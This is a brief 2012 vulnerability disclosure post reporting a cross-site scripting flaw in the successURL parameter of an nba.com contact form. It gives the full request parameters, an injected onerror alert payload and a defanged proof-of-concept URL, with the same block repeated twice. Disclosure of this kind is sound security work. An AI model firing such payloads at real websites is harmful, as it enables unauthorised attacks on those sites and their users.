nba.com - XSS
Am Monday, 5. Mar 2012 im Topic 'Vulnerabilities'
Details:
Parameter successURL in /webAction?actionId=emailFormRandom^Name=&Email=&Comment=&=Submit&=Reset&ReferringURL=&emailTo=technicalsupport%40nba.com&emailFrom=technicalsupport%40nba.com&successURL=%2F&subject=NBA.com+404+Error+Message is vulnerable to "+onerror="alert(1)" XSS input.
Proof Of Concept:
hxxp://www.nba.com:80/webAction?actionId=emailFormRandom
Parameter successURL in /webAction?actionId=emailFormRandom^Name=&Email=&Comment=&=Submit&=Reset&ReferringURL=&emailTo=technicalsupport%40nba.com&emailFrom=technicalsupport%40nba.com&successURL=%2F&subject=NBA.com+404+Error+Message is vulnerable to "+onerror="alert(1)" XSS input.
Proof Of Concept:
hxxp://www.nba.com:80/webAction?actionId=emailFormRandom